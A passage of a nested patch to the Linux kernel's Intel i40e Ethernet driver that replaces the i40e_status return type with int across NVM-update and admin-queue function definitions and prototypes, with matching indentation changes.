+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno);
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno);
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno);
+ static inline u8 i40e_nvmupd_get_module(u32 val)
+ {
+ 	return (u8)(val & I40E_NVM_MOD_PNT_MASK);
+@@ -807,12 +807,12 @@ static const char * const i40e_nvm_update_state_str[] = {
+  *
+  * Dispatches command depending on what update state is current
+  **/
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *perrno)
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *perrno)
+ {
+-	i40e_status status;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status;
+ 
+ 	/* assume success */
+ 	*perrno = 0;
+@@ -923,12 +923,12 @@ i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+  * Process legitimate commands of the Init state and conditionally set next
+  * state. Reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1062,12 +1062,12 @@ static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1104,13 +1104,13 @@ static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands
+  **/
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
+ 	bool retry_attempt = false;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1187,8 +1187,8 @@ retry:
+ 	 */
+ 	if (status && (hw->aq.asq_last_status == I40E_AQ_RC_EBUSY) &&
+ 	    !retry_attempt) {
+-		i40e_status old_status = status;
+ 		u32 old_asq_status = hw->aq.asq_last_status;
++		int old_status = status;
+ 		u32 gtime;
+ 
+ 		gtime = rd32(hw, I40E_GLVFGEN_TIMER);
+@@ -1370,17 +1370,17 @@ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno)
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	struct i40e_aq_desc *aq_desc;
+ 	u32 buff_size = 0;
+ 	u8 *buff = NULL;
+ 	u32 aq_desc_len;
+ 	u32 aq_data_len;
++	int status;
+ 
+ 	i40e_debug(hw, I40E_DEBUG_NVM, "NVMUPD: %s\n", __func__);
+ 	if (cmd->offset == 0xffff)
+@@ -1429,8 +1429,8 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+ 				       buff_size, &cmd_details);
+ 	if (status) {
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "i40e_nvmupd_exec_aq err %s aq_err %s\n",
+-			   i40e_stat_str(hw, status),
++			   "%s err %d aq_err %s\n",
++			   __func__, status,
+ 			   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		*perrno = i40e_aq_rc_to_posix(status, hw->aq.asq_last_status);
+ 		return status;
+@@ -1454,9 +1454,9 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1523,9 +1523,9 @@ static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1557,13 +1557,13 @@ static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	u8 module, transaction;
++	int status;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1596,13 +1596,13 @@ static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno)
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1636,14 +1636,14 @@ static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
+ 	u8 preservation_flags;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_osdep.h b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+index 2f6815b2f8df8..2bd4de03dafa2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_osdep.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+@@ -56,5 +56,4 @@ do {								\
+ 			(h)->bus.func, ##__VA_ARGS__);		\
+ } while (0)
+ 
+-typedef enum i40e_status_code i40e_status;
+ #endif /* _I40E_OSDEP_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_prototype.h b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+index ebdcde6f1aeb4..c9c3726eafbec 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_prototype.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+@@ -16,29 +16,29 @@
+  */
+ 
+ /* adminq functions */
+-i40e_status i40e_init_adminq(struct i40e_hw *hw);
++int i40e_init_adminq(struct i40e_hw *hw);
+ void i40e_shutdown_adminq(struct i40e_hw *hw);
+ void i40e_adminq_init_ring_data(struct i40e_hw *hw);
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *events_pending);
+-i40e_status
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *events_pending);
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw,
+ 			 struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */
+ 			 u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+ 			 enum i40e_admin_queue_err *aq_status);
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */ u16  buff_size,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context);
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -53,324 +53,307 @@ void i40e_debug_aq(struct i40e_hw *hw, enum i40e_debug_mask mask,
+ 
+ void i40e_idle_aq(struct i40e_hw *hw);
+ bool i40e_check_asq_alive(struct i40e_hw *hw);
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
++int i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
+ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err);
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err);
+ 
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
+ 
+ u32 i40e_led_get(struct i40e_hw *hw);
+ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink);
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode);
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode);
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
+ 
+ /* admin send queue commands */
+ 
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
+-				u32  reg_addr, u64 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				      struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_reset);
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
+-				u64 advt_reg,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
++				u32 reg_addr, u64 *reg_val,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++				 bool qualified_modules, bool report_init,
++				 struct i40e_aq_get_phy_abilities_resp *abilities,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures, bool atomic_reset);
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
++			       u64 advt_reg,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 vsi_id, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details,
+-		bool rx_only_promisc);
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				u16 seid, bool enable,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *pveb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id, bool *floating,
+-				u16 *statistic_index, u16 *vebs_used,
+-				u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 vsi_id, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
++					u16 vsi_id, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc);
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
++					  u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *pveb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id, bool *floating,
++			       u16 *statistic_index, u16 *vebs_used,
++			       u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
+ 			struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
+-i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+-		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+-		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+-		       enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
+-i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+-			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+-			  enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free);
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free);
++int i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
++			   struct i40e_aqc_add_macvlan_element_data *mv_list,
++			   u16 count, struct i40e_asq_cmd_details *cmd_details,
++			   enum i40e_admin_queue_err *aq_status);
++int i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
++			   struct i40e_aqc_remove_macvlan_element_data *mv_list,
++			   u16 count, struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
++			      struct i40e_aqc_remove_macvlan_element_data *mv_list,
++			      u16 count, struct i40e_asq_cmd_details *cmd_details,
++			      enum i40e_admin_queue_err *aq_status);
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free);
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free);
+ 
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
+ 			      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
+-				  struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
+-i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+-		     u8 mib_type, void *buff, u16 buff_size,
+-		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
+-i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
+ 		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-			      bool persist,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
+-				       bool dcb_enable,
+-				       struct i40e_asq_cmd_details
+-				       *cmd_details);
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
++				  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details);
